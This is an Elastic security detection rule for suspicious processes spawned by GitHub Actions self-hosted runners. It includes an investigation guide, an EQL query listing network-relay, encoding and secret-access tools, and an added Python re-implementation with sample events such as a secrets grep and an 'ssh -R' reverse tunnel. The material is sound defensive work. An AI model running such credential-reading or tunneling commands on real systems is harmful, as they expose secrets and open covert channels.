Execution via GitHub Actions Runner
This rule detects potentially dangerous commands spawned by the GitHub Actions Runner.Worker process or by shell interpreters launched via a runner entrypoint script on self-hosted runner machines. Adversaries who gain the ability to modify or trigger workflows in a linked GitHub repository can execute arbitrary commands on the runner host. This behavior may indicate malicious or unexpected workflow activity, including code execution, reconnaissance, credential harvesting, or network exfiltration initiated through a compromised repository or unauthorized workflow.
Rule type: eql
Rule indices:
- endgame-*
- logs-crowdstrike.fdr*
- logs-endpoint.events.process-*
- logs-m365_defender.event-*
- logs-sentinel_one_cloud_funnel.*
- logs-system.security*
- logs-windows.forwarded*
- logs-windows.sysmon_operational-*
- winlogbeat-*
- auditbeat-*
- logs-auditd_manager.auditd-*
Severity: medium
Risk score: 47
Runs every: 5m
Searches indices from: now-9m (Date Math format, see also Additional look-back time)
Maximum alerts per execution: 100
References:
Tags:
- Domain: Endpoint
- OS: Linux
- OS: Windows
- OS: macOS
- Use Case: Threat Detection
- Tactic: Execution
- Tactic: Initial Access
- Data Source: Elastic Endgame
- Data Source: Elastic Defend
- Data Source: Windows Security Event Logs
- Data Source: Microsoft Defender XDR
- Data Source: Sysmon
- Data Source: SentinelOne
- Data Source: Crowdstrike
- Data Source: Auditd Manager
- Resources: Investigation Guide
Version: 3
Rule authors:
- Elastic
Rule license: Elastic License v2
Investigation guide
Triage and analysis
Investigating Execution via GitHub Actions Runner
Adversaries who gain the ability to modify or trigger workflows in a linked GitHub repository can execute arbitrary
commands on the runner host. This rule covers two parent process paths:
- Direct execution: process spawned directly by Runner.Worker / Runner.Worker.exe.
- Entrypoint script execution: process spawned by a shell (sh, bash, zsh) whose command line references
a runner entrypoint.sh script, a common pattern when the runner bootstraps workflow steps via a shell script.
Possible investigation steps
- Review process.command_line and process.parent.command_line to determine whether the activity matches a known, authorized workflow step.
- For grep, find, pgrep, printenv, and env hits, assess whether the command targets sensitive paths, environment variables (e.g. secrets, tokens), or process listings inconsistent with the declared workflow.
- For openssl and base64 hits, inspect arguments for encoding/decoding operations that may indicate credential harvesting, data staging, or a C2 channel.
- For tr and cat hits, assess whether they are chained with other suspicious commands (e.g. cat /etc/passwd | base64, cat ~/.ssh/id_rsa) to read and encode sensitive files for exfiltration.
- For nc, ncat, netcat, and socat hits, check arguments for reverse shell patterns or port-forwarding to attacker-controlled infrastructure.
- For wg and wg-quick hits, inspect arguments for tunnel configuration that may establish a covert egress channel.
- For ssh hits, review arguments for reverse tunnel flags (-R) or connections to unexpected remote hosts.
- For kubectl and helm hits, assess whether commands target sensitive namespaces, extract secrets, or deploy workloads inconsistent with the declared workflow.
- For vault hits, inspect arguments for secret reads (vault kv get) or token operations that may indicate credential harvesting from a HashiCorp Vault instance.
- For gh hits, review arguments for repository cloning, secret access (gh secret), or actions that escalate access via the runner's GitHub token.
- For nmap hits, assess whether the command performs host or port discovery against internal network ranges, indicating lateral movement preparation.
- Examine associated network activity for unexpected outbound connections, especially following curl, wget, or openssl s_client invocations.
- Verify whether the triggering workflow run was initiated by an authorized actor and matches the repository's expected workflow definitions.
- Correlate with file-write and file-access events to identify any sensitive file staging or collection activity.
- Correlate with other alerts to determine if this activity is part of a broader supply chain or CI/CD compromise.
False positive analysis
- Authorized GitHub workflow actions that legitimately use discovery utilities (find, grep, env, nmap), data manipulation tools (cat, tr), encoding tools (openssl, base64), remote access tools (ssh), or infrastructure CLIs (kubectl, helm, vault, gh) as part of their build, test, or deploy steps may trigger this rule. Validate against known workflow definitions and consider adding workflow-specific exclusions if the volume is high.
Response and remediation
- Immediately isolate the affected system from the network to prevent further unauthorized command execution and potential lateral movement.
- Terminate any suspicious child processes that were initiated by the GitHub Actions runner.
- Conduct a thorough review of the affected system’s logs and configurations to identify any unauthorized changes or additional indicators of compromise.
- Restore the system from a known good backup if any unauthorized changes or malicious activities are confirmed.
- Implement application whitelisting to prevent unauthorized execution.
- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network.
Rule query
process where event.type == "start" and event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and
(
  /* Direct child of the GitHub Actions Runner.Worker process */
  process.parent.name in ("Runner.Worker", "Runner.Worker.exe") or
  /* Child of a shell interpreter launched via a runner entrypoint script
     (e.g. /home/runner/runners/<ver>/run/entrypoint.sh or similar paths) */
  (
    process.parent.name in ("sh", "bash", "zsh") and
    process.parent.command_line like "*runner*entrypoint.sh"
  )
) and
(
  process.name : (
    /* Network / download utilities */
    "curl", "curl.exe", "wget", "wget.exe",
    /* Windows scripting & LOLBins */
    "powershell.exe", "cmd.exe", "pwsh.exe", "certutil.exe", "rundll32.exe",
    /* Unix shells */
    "bash", "sh", "zsh", "dash", "ash", "tcsh", "csh", "ksh", "fish", "mksh", "busybox", "pwsh",
    /* File / archive manipulation */
    "tar", "gzip", "rm", "sed", "chmod",
    /* macOS-specific */
    "osascript",
    /* Process persistence helpers */
    "nohup", "setsid",
    /* Scripting runtimes */
    "python*", "perl*", "ruby*", "lua*", "php*", "node", "nodejs", "node.exe",
    /* Discovery & reconnaissance */
    "pgrep", "grep", "find", "printenv", "env", "nmap",
    /* Crypto / encoding (potential exfiltration or C2 channel) */
    "openssl", "base64", "basez", "base64plain", "base64url", "base64mime", "base64pem", "basenc", "base32", "base16", "xxd",
    /* Data manipulation / inspection */
    "tr", "cat",
    /* Network relay / tunneling */
    "nc", "ncat", "netcat", "nc.traditional", "nc.openbsd", "socat", "wg", "wg-quick",
    /* Remote access */
    "ssh", "ssh.exe", "ftp", "tftp", "scp", "sftp",
    /* Kubernetes / infrastructure */
    "kubectl", "helm", "docker", "ctr", "crictl",
    /* Secret management */
    "vault",
    /* GitHub CLI */
    "gh",
    /* AWS CLI */
    "aws",
    /* Azure CLI */
    "az",
    /* GCP CLI */
    "gcloud",
    /* Google Workspace CLI */
    "gws"
  ) or
  process.executable : ("/tmp/*", "/private/tmp/*", "/var/tmp/*", "/dev/shm/*", "/run/*", "/var/run/*", "?:\\Users\\*")
)
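The query above and the per-utility checks from the investigation guide, re-implemented as an added Python example (not Elastic's code and not the rule itself) so the detection logic can be exercised offline before tuning exclusions. It assumes events arrive as flat dicts keyed by ECS field name; the sample events, the X.Y.Z runner version, hosts and paths are constructed placeholders, and the triage regexes are this example's own approximation of the indicators the guide names. It also goes one step beyond the text by including a case the query does not cover: a utility spawned by a JavaScript action's node process has node, not the runner, as its parent.

```python
"""Added example, not Elastic's code: re-implements the rule's EQL conditions
in Python so the query logic can be exercised offline against constructed
ECS-style process events (flat dicts keyed by ECS field name), then applies
the command-line checks from the investigation guide as triage notes."""
import re
from fnmatch import fnmatchcase

START_ACTIONS = {"exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started"}
RUNNER_PARENTS = {"Runner.Worker", "Runner.Worker.exe"}
ENTRYPOINT_SHELLS = {"sh", "bash", "zsh"}
# process.name / process.executable patterns copied from the rule query. EQL's ':'
# operator is case-insensitive and treats '*' and '?' as wildcards.
NAME_PATTERNS = [
    "curl", "curl.exe", "wget", "wget.exe", "powershell.exe", "cmd.exe", "pwsh.exe",
    "certutil.exe", "rundll32.exe", "bash", "sh", "zsh", "dash", "ash", "tcsh", "csh",
    "ksh", "fish", "mksh", "busybox", "pwsh", "tar", "gzip", "rm", "sed", "chmod",
    "osascript", "nohup", "setsid", "python*", "perl*", "ruby*", "lua*", "php*", "node",
    "nodejs", "node.exe", "pgrep", "grep", "find", "printenv", "env", "nmap", "openssl",
    "base64", "basez", "base64plain", "base64url", "base64mime", "base64pem", "basenc",
    "base32", "base16", "xxd", "tr", "cat", "nc", "ncat", "netcat", "nc.traditional",
    "nc.openbsd", "socat", "wg", "wg-quick", "ssh", "ssh.exe", "ftp", "tftp", "scp", "sftp",
    "kubectl", "helm", "docker", "ctr", "crictl", "vault", "gh", "aws", "az", "gcloud", "gws",
]
EXECUTABLE_PATTERNS = ["/tmp/*", "/private/tmp/*", "/var/tmp/*", "/dev/shm/*",
                       "/run/*", "/var/run/*", r"?:\Users\*"]

def _glob_any(value, patterns):
    """Case-insensitive wildcard match, mirroring EQL's ':' operator."""
    value = (value or "").lower()
    return any(fnmatchcase(value, p.lower()) for p in patterns)

def matches_rule(ev):
    """True when the event satisfies every condition of the rule query."""
    if ev.get("event.type") != "start" or ev.get("event.action") not in START_ACTIONS:
        return False
    parent = ev.get("process.parent.name", "")
    parent_cmd = ev.get("process.parent.command_line", "")
    # EQL 'in' and 'like' are case-sensitive, so the parent checks are exact
    from_runner = parent in RUNNER_PARENTS or (
        parent in ENTRYPOINT_SHELLS and fnmatchcase(parent_cmd, "*runner*entrypoint.sh"))
    if not from_runner:
        return False
    return (_glob_any(ev.get("process.name"), NAME_PATTERNS)
            or _glob_any(ev.get("process.executable"), EXECUTABLE_PATTERNS))

# (process names, regex over process.command_line, note). The indicators are the ones
# the investigation guide names; the regexes themselves are this example's own.
TRIAGE_CHECKS = [
    ({"grep", "find", "pgrep", "printenv", "env"}, r"(?i)secret|token|/\.ssh|/etc/passwd",
     "discovery targets secrets, tokens or sensitive paths"),
    ({"openssl", "base64"}, r"(?i)\b(enc|s_client)\b|-d\b|--decode", "encode/decode or TLS client use"),
    ({"cat", "tr"}, r"/etc/passwd|/\.ssh/|\|\s*base64", "reads or encodes sensitive files"),
    ({"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd", "socat"}, r"/bin/(ba)?sh|exec:",
     "shell attached to a network relay"),
    ({"wg", "wg-quick"}, r"\bup\b", "tunnel brought up from a workflow step"),
    ({"ssh", "ssh.exe"}, r"(^|\s)-R\b", "reverse tunnel flag -R"),
    ({"kubectl", "helm"}, r"(?i)secret|kube-system", "secret access or sensitive namespace"),
    ({"vault"}, r"kv get|token", "secret read or token operation"),
    ({"gh"}, r"\bsecret\b|\bclone\b", "secret access or cloning via the runner token"),
]

def triage_notes(ev):
    """Investigation-guide checks that apply to the event's command line."""
    name = (ev.get("process.name") or "").lower()
    cmd = ev.get("process.command_line") or ""
    return [note for names, pattern, note in TRIAGE_CHECKS
            if name in names and re.search(pattern, cmd)]

# Constructed sample events; paths, hosts and the runner version are placeholders.
SAMPLE_EVENTS = [
    {"id": "grep-secrets", "event.type": "start", "event.action": "exec",
     "process.parent.name": "Runner.Worker", "process.name": "grep",
     "process.command_line": "grep -r AWS_SECRET /home/runner/.aws"},
    {"id": "ssh-reverse-tunnel", "event.type": "start", "event.action": "exec_event",
     "process.parent.name": "bash",
     "process.parent.command_line": "/bin/bash /home/runner/runners/X.Y.Z/run/entrypoint.sh",
     "process.name": "ssh", "process.command_line": "ssh -R 9000:localhost:22 ci@relay.example"},
    # curl spawned by a JavaScript action's node process: node, not the runner, is the parent,
    # so neither parent path in the query covers it (a gap worth knowing during triage)
    {"id": "curl-under-node", "event.type": "start", "event.action": "exec",
     "process.parent.name": "node", "process.name": "curl",
     "process.command_line": "curl -fsSL https://relay.example/"},
    {"id": "windows-user-profile", "event.type": "start", "event.action": "start",
     "process.parent.name": "Runner.Worker.exe", "process.name": "helper.exe",
     "process.executable": r"C:\Users\runner\AppData\Local\Temp\helper.exe"},
]

def evaluate(events):
    """Run the rule over events; matching events carry their triage notes."""
    out = []
    for ev in events:
        hit = matches_rule(ev)
        out.append({"id": ev["id"], "matched": hit, "notes": triage_notes(ev) if hit else []})
    return out

if __name__ == "__main__":
    for r in evaluate(SAMPLE_EVENTS):
        print(f"{r['id']:<22} matched={str(r['matched']):<5} {'; '.join(r['notes'])}")
```

Running the file prints one line per sample event: the grep and ssh events match with a triage note each, the Windows event matches on the ?:\Users\* executable pattern alone, and the curl-under-node event does not match. Tuning work (workflow-specific exclusions, or extending the parent paths) can be checked the same way by adding events that represent the authorized workflow steps.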
Framework: MITRE ATT&CK™
- Tactic:
  - Name: Execution
  - ID: TA0002
  - Reference URL: https://attack.mitre.org/tactics/TA0002/
- Technique:
  - Name: Command and Scripting Interpreter
  - ID: T1059
  - Reference URL: https://attack.mitre.org/techniques/T1059/
- Sub-technique:
  - Name: PowerShell
  - ID: T1059.001
  - Reference URL: https://attack.mitre.org/techniques/T1059/001/
- Sub-technique:
  - Name: AppleScript
  - ID: T1059.002
  - Reference URL: https://attack.mitre.org/techniques/T1059/002/
- Sub-technique:
  - Name: Windows Command Shell
  - ID: T1059.003
  - Reference URL: https://attack.mitre.org/techniques/T1059/003/
- Sub-technique:
  - Name: Unix Shell
  - ID: T1059.004
  - Reference URL: https://attack.mitre.org/techniques/T1059/004/
- Sub-technique:
  - Name: Python
  - ID: T1059.006
  - Reference URL: https://attack.mitre.org/techniques/T1059/006/
- Sub-technique:
  - Name: JavaScript
  - ID: T1059.007
  - Reference URL: https://attack.mitre.org/techniques/T1059/007/
- Tactic:
  - Name: Initial Access
  - ID: TA0001
  - Reference URL: https://attack.mitre.org/tactics/TA0001/
- Technique:
  - Name: Supply Chain Compromise
  - ID: T1195
  - Reference URL: https://attack.mitre.org/techniques/T1195/
- Sub-technique:
  - Name: Compromise Software Supply Chain
  - ID: T1195.002
  - Reference URL: https://attack.mitre.org/techniques/T1195/002/
- Tactic:
  - Name: Defense Evasion
  - ID: TA0005
  - Reference URL: https://attack.mitre.org/tactics/TA0005/
- Technique:
  - Name: System Binary Proxy Execution
  - ID: T1218
  - Reference URL: https://attack.mitre.org/techniques/T1218/
- Sub-technique:
  - Name: Rundll32
  - ID: T1218.011
  - Reference URL: https://attack.mitre.org/techniques/T1218/011/